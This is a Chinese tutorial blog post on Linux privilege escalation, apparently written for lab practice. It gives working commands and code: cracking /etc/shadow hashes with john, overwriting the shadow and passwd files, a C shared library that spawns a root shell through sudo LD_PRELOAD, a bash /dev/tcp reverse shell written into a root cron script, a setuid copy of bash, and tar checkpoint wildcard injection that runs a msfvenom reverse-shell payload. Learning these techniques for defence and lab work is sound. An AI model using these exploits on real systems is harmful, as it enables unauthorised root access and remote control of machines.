linux提权——提权大赏

2024-04-21 17:04
文章标签 linux 提权 大赏

本文主要是介绍linux提权——提权大赏,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • 一、可读shadow文件利用提权
  • 二、可写shadow文件利用提权
  • 三、可写passwd文件利用提权
  • 四、sudo环境变量提权
    • 配置环境
    • 实验
  • 五、自动任务文件权限提升
    • 配置环境
    • 实验
  • 六、自动任务PATH环境变量提权
  • 七、自动任务通配符提权

一、可读shadow文件利用提权

ls -al /etc/shadow # 查看文件属性,确保当前用户对shadow文件具有可读权限
cat /etc/shadow | grep ':\$' # 查看shadow文件夹,grep相当于过滤器,后面接过滤条件

在这里插入图片描述

/etc/shadow文件中,每个用户的密码都是用一个特定的哈希函数加密的。为了避免密码被轻易破解,Linux 系统会使用不同的哈希函数来加密密码。而$y$中的y字符则表示使用的是哪种哈希函数,不同的哈希函数对应不同的字符。以下是一些常见的 $y$ 值及其对应的哈希函数:

  • $1$表示使用的是 MD5 哈希函数;
  • $2$$2a$表示使用的是 Blowfish 哈希函数;
  • $5$表示使用的是 SHA-256 哈希函数;
  • $6$表示使用的是 SHA-512 哈希函数。
sudo john --wordlist=/usr/share/wordlist/rockyou.txt hash.txt # john进行破解

在这里插入图片描述

二、可写shadow文件利用提权

思路:写入

cp /etc/shadow /tmp/shadow.bak  # 备份重要文件
mkpasswd -m sha-512 123456 # 生成hash,hash算法为sha-512
# 替换/etc/shadow中root的密码

mkpasswd是linux中专门用来生成密码hash的工具,-m用来指定hash算法。

在这里插入图片描述

三、可写passwd文件利用提权

提权肯定最先关注root用户,现代的linux发行版中,密码hash都是存储在/etc/shadow中,/etc/passwd中并不直接存储密码hash,通常用X来占位,但是还是可以直接将密码写入/etcpasswd中,尝试提权。也就是一个优先级的问题,先读取passwd,再读取shadow文件。

cp /etc/passwd /tmp/passwd.bak # 备份文件
openssl passwd <明文> # openssl passwd生成密码的hash值
# 替换/etc/passwd中的X

在这里插入图片描述

生成hash时,也可以用mkpasswd,但是passwd文件中生成hash时最好用openssl passwd,再shadow文件中生成hash用mkpasswd

四、sudo环境变量提权

当用whoami命令查看当前用户的用户名时,显示whoami:无法找到id值为XXX的用户。原因:当前用没有权限读取/etc/passwd或者/etc/shadow解决方法:修改文件权限,chmod 644 /etc/passwd
在这里插入图片描述

配置环境

adduser test # root用户下新增test用户# 补充
sudo adduser test sudo # 将test用户添加到sudo组中
sudo deluser test sudo # 将test用户从sudo组中删除

在这里插入图片描述

vim /etc/sudoers # 使用root用户编/etc/sudoers文件,/etc/sudoers文件是sudo命令的配置文件# 添加
Defaults env_keep+=LD_PRELOAD
test ALL=(ALL:ALL) NOPASSWD:/usr/bin/find # 简单来说,用户test可以使用sudo命令执行find命令

在这里插入图片描述
在这里插入图片描述
test用户只允许执行sudo find,其他sudo命令不允许执行。
在这里插入图片描述

实验

使用test用户登录到系统,使用sudo -l查看当前用户能够以root用户身份执行哪些命令,其实就是看他能执行哪些sudo命令。这里的话,test用户只允许执行sudo find,且不需要密码

在这里插入图片描述

  • Defaults env_reset表示默认会重置环境变量,因此自定义的变量会在 sudo 环境中失效,也就不会获取正确的变量值。
  • env_keep配置项,用于保留部分环境变量不被重置,需要保留的变量就写入双引号之中。
  • secure_path配置项,其中包含的路径将被当做sudo环境的PATH变量使用。也就是说如果在 sudo 环境无法找到某些命令,那么可以将这些命令的路径加入该配置项之中。
  • LD_PRELOAD是一个环境变量,用于指定在程序加载时预加载的共享库。这个环境变量允许用户在运行程序之前,通过指定预加载的共享库,修改程序的行为。当设置LD_PRELOAD环境变量时,指定的共享库将在程序加载时优先于其他库加载,并将其函数和符号替换为预加载的库中的函数和符号。LD:Linking Dynamic.

也就是说我们在使用sudo find命令时,会以root用户的身份执行命令,同时环境变量中的自定义变量将失效,而且执行sudo find命令之前,会加载共享库文件,共享库文件的路径由LD_PRELOAD指定

1、关于/bin/sbin/usr/sbin/usr/bin文件夹

  • 从命令功能角度:
    • /sbin下的命令属于基本的系统命令,如shutdownreboot,用于启动系统,修复系统。
    • /bin下存放一些普通的基本命令,如lschmod等,这些命令在Linux系统里的配置文件脚本里经常用到。
  • 从用户权限的角度:
    • /sbin目录下的命令通常只有管理员才可以运行。
    • /bin下的命令管理员和一般的用户都可以使用。
  • /usr/sbin存放的一些非必须的系统命令;/usr/bin存放一些用户命令。

2、链接

  • 静态链接(Static Linking):在静态链接中,编译器将所有的目标文件和库文件的机器代码合并到一个单独的可执行文件中。这意味着所有的代码和库都被复制到最终的可执行文件中。例如,linux中,使用C语言编写的代码,需要先经过编译器编译将C语言代码转化为机器码,也就是目标文件(.o文件),再链接所需库文件生成可执行文件(.exe文件)。
  • 动态链接(Dynamic Linking):在动态链接中,目标文件中只包含对所需库函数的引用,而不包含实际的函数实现。在程序运行时,操作系统会在内存中加载并链接所需的共享库,将其与程序进行动态链接。常见的动态链接库文件有 .so(Linux)和 .dll(Windows)。
  • 加载时链接(Load-time Linking):加载时链接是在程序加载到内存时进行的链接过程。程序在加载时需要引入所需的库,并在加载时解析并链接这些库。这种链接方式介于静态链接和动态链接之间,它使得程序在运行前不需要包含完整的库代码,但仍然需要在每次加载时进行链接。

编写shellcode:

 #include <stdio.h> //标准输入输出库#include <sys/types.h> //数据类型库#include <stdlib.h> //C语言标准库#include <unistd.h> //包含setuid和setgid的库void _init(){unsetenv("LD_PRELOAD"); //一旦程序结束或重新启动,环境变量将会恢复到其默认或先前设置的状态。setgid(0);setuid(0); //程序以root用户身份执行后续操作system("/bin/bash");}

编译源代码:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# -fPIC:生成位置独立代码(Position Independent Code),可以在内存中的任何位置加载和执行,而不受具体加载地址的限制。
# -shared:指定生成共享库。
# -o <file>:输出文件。
# -nostartfiles:不使用默认的启动文件

提权

sudo LD_PRELOAD=/home/test/shell.so find # 指定共享库位置,执行该命令时,会先加载共享库文件shell.so

在这里插入图片描述

其实在shell.c中也可以不用setuid(0);setgid(0),因为在执行sudo find时本来就是root权限,预先加载共享库shell.so时,也是以root用户的权限去加载的。
在这里插入图片描述

五、自动任务文件权限提升

配置环境

写一个自动任务脚本,脚本内容:

echo `date` >> /tmp/useless # 查看当前时间,并写入/tmp/useless目录下

在这里插入图片描述
直接编辑vim /etc/crontab文件,写入定时任务,* * * * * root bash /root/overwrite.sh,大致意思就是每分钟以root用户允许overwrite.sh文件。
在这里插入图片描述
可以看到定时任务执行成功。
在这里插入图片描述

实验

当登录到一台主机后,查看其定时任务:

cat /etc/crontab

可以看到有一个定时任务,每隔一分钟就执行bash /root/overwrite.sh,且以root用户身份执行。
在这里插入图片描述

locate overwrite.sh # 如果不知道脚本路径,就用locate定位文件位置
ls -al # 查看当前用户的文件权限,可写,就直接将反弹shell写入该脚本

在这里插入图片描述

bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 # 反弹shell脚本nc -lnvp 4444 # 攻击机监听4444端口

在这里插入图片描述
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。0>&1是就是将127.0.0.1:4444的标准输入与127.0.0.1:4444的标准输出进行绑定,使得从127.0.0.1:4444来的输入可以发给靶机shell。也可以将0>&1替换为0>&2,效果是差不多的。

在这里插入图片描述

六、自动任务PATH环境变量提权

cat /etc/crontab查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现提权;另一方面也可以从/etc/crontab中的PATH入手,达到提权目的。
具体如下:在执行自动任务的时候,系统会优先关注/etc/crontab中的PATH,而不是使用系统默认的PATH;自动任务中,脚本路径要么是绝对路径,要么是相对路径,如果是相对路径的话,将会根据PATH参数去相应的文件夹下找,是否有对应的脚本。,例如,此处overwrite.sh是相对路径,当执行该脚本的时候,系统会先去/home/test目录下去找,如果没有,再去/usr/local/sbin目录下去找,依此类推…

在这里插入图片描述
这里的话,因为overwrite.sh是相对路径,而且/home/test是第一优先目录,所以可以在/home/test目录下新建一个overwrite.sh脚本文件,尽管这不是真正的路径,但是系统还是优先执行/home/test/overwrite.sh

vim overwrite.sh# 内容
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +sx /tmp/rootbash # 必须加s属性,只有加了s属性,才能以root用户的身份去获取shell,否则就还是当前用户的shell

在这里插入图片描述

七、自动任务通配符提权

cat /etc/crontab查看系统临时任务,发现会自动执行/usr/local/bin/compress.sh。查看该文件,发现:系统会切换到/home/test目录下,然后用tar打包该目录下的所有文件,打包到/tmp/backup.tar.gz
在这里插入图片描述

在这里插入图片描述
tar命令中有两个参数,分别为:--checkpoint--checkpoint-action参数,--checkpoint=n:每打包n个文件就设置一个检查点,在检查点可以执行任何操作,操作由--checkpoint-action指定,exec代表执行外部命令。

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf # 生成二进制的反弹shell,-p:shell类型,-f:文件格式,elf是linux下的二进制文件,-o:输出文件touch /home/test--checkpoint=1 //注入一个检查点,用于告诉tar存在一个检查点
touch /home/test--checkpoint-action=exec=shell.elf // 在检查点处执行外部命令

在这里插入图片描述
在这里插入图片描述

—————————————————————————————————————————
待续…

这篇关于linux提权——提权大赏的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/923595

相关文章

防止Linux rm命令误操作的多场景防护方案与实践

《防止Linuxrm命令误操作的多场景防护方案与实践》在Linux系统中,rm命令是删除文件和目录的高效工具,但一旦误操作,如执行rm-rf/或rm-rf/*,极易导致系统数据灾难,本文针对不同场景... 目录引言理解 rm 命令及误操作风险rm 命令基础常见误操作案例防护方案使用 rm编程 别名及安全删除

Linux下MySQL数据库定时备份脚本与Crontab配置教学

《Linux下MySQL数据库定时备份脚本与Crontab配置教学》在生产环境中,数据库是核心资产之一,定期备份数据库可以有效防止意外数据丢失,本文将分享一份MySQL定时备份脚本,并讲解如何通过cr... 目录备份脚本详解脚本功能说明授权与可执行权限使用 Crontab 定时执行编辑 Crontab添加定

使用docker搭建嵌入式Linux开发环境

《使用docker搭建嵌入式Linux开发环境》本文主要介绍了使用docker搭建嵌入式Linux开发环境,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面... 目录1、前言2、安装docker3、编写容器管理脚本4、创建容器1、前言在日常开发全志、rk等不同

linux系统上安装JDK8全过程

《linux系统上安装JDK8全过程》文章介绍安装JDK的必要性及Linux下JDK8的安装步骤,包括卸载旧版本、下载解压、配置环境变量等,强调开发需JDK,运行可选JRE,现JDK已集成JRE... 目录为什么要安装jdk?1.查看linux系统是否有自带的jdk:2.下载jdk压缩包2.解压3.配置环境

Linux搭建ftp服务器的步骤

《Linux搭建ftp服务器的步骤》本文给大家分享Linux搭建ftp服务器的步骤,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧... 目录ftp搭建1:下载vsftpd工具2:下载客户端工具3:进入配置文件目录vsftpd.conf配置文件4:

Linux实现查看某一端口是否开放

《Linux实现查看某一端口是否开放》文章介绍了三种检查端口6379是否开放的方法:通过lsof查看进程占用,用netstat区分TCP/UDP监听状态,以及用telnet测试远程连接可达性... 目录1、使用lsof 命令来查看端口是否开放2、使用netstat 命令来查看端口是否开放3、使用telnet

Linux系统管理与进程任务管理方式

《Linux系统管理与进程任务管理方式》本文系统讲解Linux管理核心技能,涵盖引导流程、服务控制(Systemd与GRUB2)、进程管理(前台/后台运行、工具使用)、计划任务(at/cron)及常用... 目录引言一、linux系统引导过程与服务控制1.1 系统引导的五个关键阶段1.2 GRUB2的进化优

Linux查询服务器 IP 地址的命令详解

《Linux查询服务器IP地址的命令详解》在服务器管理和网络运维中,快速准确地获取服务器的IP地址是一项基本但至关重要的技能,下面我们来看看Linux中查询服务器IP的相关命令使用吧... 目录一、hostname 命令:简单高效的 IP 查询工具命令详解实际应用技巧注意事项二、ip 命令:新一代网络配置全

linux安装、更新、卸载anaconda实践

《linux安装、更新、卸载anaconda实践》Anaconda是基于conda的科学计算环境,集成1400+包及依赖,安装需下载脚本、接受协议、设置路径、配置环境变量,更新与卸载通过conda命令... 目录随意找一个目录下载安装脚本检查许可证协议,ENTER就可以安装完毕之后激活anaconda安装更

Linux查询服务器系统版本号的多种方法

《Linux查询服务器系统版本号的多种方法》在Linux系统管理和维护工作中,了解当前操作系统的版本信息是最基础也是最重要的操作之一,系统版本不仅关系到软件兼容性、安全更新策略,还直接影响到故障排查和... 目录一、引言:系统版本查询的重要性二、基础命令解析:cat /etc/Centos-release详